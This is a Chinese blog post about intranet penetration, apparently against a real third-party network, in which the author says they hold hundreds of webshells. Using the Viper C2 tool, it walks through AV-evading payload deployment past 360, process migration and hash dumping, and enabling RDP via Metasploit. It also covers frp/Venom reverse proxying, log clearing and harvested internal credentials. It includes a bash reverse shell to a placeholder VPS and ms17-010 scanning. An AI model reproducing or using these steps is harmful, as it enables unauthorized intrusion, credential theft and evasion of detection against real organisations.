当前位置:网站首页>实战| 记一次借Viper来多重内网渗透
实战| 记一次借Viper来多重内网渗透
2022-06-23 03:52:00 【ECHO::】
实战| 记一次借Viper来多重内网渗透
马上hw,这两天闲的荒,来点实操, --2022/6/21 19:05 ECHO::
上次打攻防漏了很多web端、很多ssh这块和端口转发的内容,,算是个很大的缺口,从我那上百个shell中随机挑个站点,开始一场内网渗透。具体怎么拿的shell,在这里,
https://blog.csdn.net/qq_29437513/article/details/122283851
0x01.Viper上线
viper更新到1.5.22了,通过Callback回调函数生成免杀exe,下载本地,上传目标机

冰蝎执行

目标环境有360,但viper还是上线了

老话题: 怎么绕过的360?怎么上线的?
- 某60,执行命令拦的很,各种白名单拦截,同时还弹窗,最常见的net user,
执行返回拒绝,这种情况360全部功能全开

2.第二种情况,360不全开,比如,用户长时间未登录,锁定,不会全拦
0x02.抓取Hash
上线后,抓取hash,viper自带有hashdump,但需要进程x64,默认上线的进程x86,进行进程迁移,,选择高权限的conhost.exe 2345explor 这些进程,(尽量不选择靠前的系统进程,注入容易重启)

抓到hash,拿去解密,Aa123456,这个内网常用弱口令,mssql和rdp,ssh常用(root admin123)

msf模块,注册表开启3389 post/windows/manage/enable_rdp
reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "1"
execute -H -f cmd.exe -a "/c sc config termservice start= disabled"
execute -H -f cmd.exe -a "/c sc stop termservice"
execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"
注册表的端口值

netstat发现已经监听,但端口扫描未发现开启,得出结论,这是内网机器,通过映射到出口ip上,

0x03.端口转发
内网的机子,虽然有webshell,但他是映射到出口ip上,不能正向代理。
可以反向代理,机子能访问外网vps的端口,吧流量转到vps端口上,在vps开个端口转发,本地pc机进行内网访问。
我这里用过的有frp 和Venom
01.frp的代理,常用的是vps监听端口,内网吧3389流量转发给vps
02.Venom的代理,和frp差不多,通常可以配合proxifer流量代理,本地Pc机访问到内网应用。
本地测试 frp
服务端只需要配置bind_port ,这里vps配置22222,

webshell端的frpc.ini配置,转发流量到vps的22222,允许外网通过vps的6000端口访问3389服务

转发成功,

吧解密的管理员密码登录

查看事件管理器,清除事件,很明显看到之前有人反复fuzz登录密码,同时登录没有rdp登录成功通过别的方式比如webshell部分也会记录,进程services.exe tomcat.exe
发现有teamviewer

0x04.内网横向
内网横向有域打域控,没域打内网其他的设备,看能拿多少台服务器,这次测试的目的是内网的服务器,内网的网络设备,摄像头、安全设备、数据库不考虑在内
判断域,不存在域
net time /domain 域控的时间同步
net config workstation 查看主机在内网的角色
横向我用的是端口转发是Venom,这tm就是神器,稳的一批。
内网资产扫描我用的是
https://github.com/1n7erface/RequestTemplate
扫描b端很全,,常见的ssh、redis和web扫描,xray的内核,挂到rdp里面
一些ssh
ssh 10.10.11.113 22 root admin123
ssh 10.10.11.110 22 root admin123
ssh 10.10.11.114 22 root admin123
10.10.30.83 1433 sa Aa123456
Venom内网渗透
1.webshell执行命令 agent.exe rhost rport

2.vps端监听1009,goto 1进行操作,socks代理出来本地PC通过proxifer代理连接

本地PC通过Proxifer设置socks代理

设置代理规则

本地PC-xshell连接内网ssh,

登录成功,查看history,有很明显的开发痕迹,这里不进行后续渗透

nc反弹shell到vps,点到为止,
nc -lvp 6000
bash -i >& /dev/tcp/vpsip/6000 0>&1
反弹成功,拿到shell

到此为止,,走之前清理痕迹,msf批量扫描ms17-010捡个漏
msf添加路由,

有捡漏,但不进行后续渗透

边栏推荐
- Pta:7-64 what day of the year is this day
- Volatile and threads
- Abnova liquidcell negative enrichment cell separation and recovery system
- Abnova actn4 purified rabbit polyclonal antibody instructions
- 独立站聊天机器人有哪些类型?如何快速创建属于自己的免费聊天机器人?只需3秒钟就能搞定!
- 2 万字 + 20张图|细说 Redis 九种数据类型和应用场景
- Const understanding one
- Abnova 荧光染料 510-M 链霉亲和素方案
- Freemodbus parsing 1
- 第二次作业笔记
猜你喜欢

Cocos学习日记2——脚本和属性

golang使用mongo-driver操作——增(基础)

Abnova PSMA磁珠解决方案

Precautions for running high-frequency and high-speed signal lines near PCB board - basic principles for high-frequency and high-speed signal design

Halcon knowledge: binocular_ Discrimination knowledge

一款MVC5+EasyUI企业快速开发框架源码 BS框架源码

Abnova acid phosphatase (wheat germ) instructions

磁阻 磁饱和

接收传来得文件并下载(简单用法)a标签

2020:VL-BERT: Pre-training of generic visual-linguistic representation
随机推荐
The paddepaddle model is deployed in a service-oriented manner. After restarting the pipeline, an error is reported, and the TRT error is reported
Pta:6-30 time addition
const理解之一
Abnova ABCB10(人)重组蛋白说明书
Pta:6-29 application of virtual base classes - people, teachers and students
#18生成器函数的参数传递
Abnova abcb10 (human) recombinant protein specification
thinkphp6 无关联ID的连表查询(2张表)主要是select的应用
Fundamentals of 3D mathematics [16] formulas for uniformly accelerated linear motion
在Pycharm中使用append()方法对列表添加元素时提示“This list creation could be rewritten as a list literal“的解决方法
Can bus Basics
使用Live Chat促进业务销售的惊人技巧
32单片机一个变量多个.c里使用
C语言刷题随记 —— 自由落体的球
DSP7 环境
Abnova ACTN4纯化兔多克隆抗体说明书
ApiPost接口测试的用法之------Get
美团好文:从预编译的角度理解Swift与Objective-C及混编机制
Chrome调试技巧
Const understanding one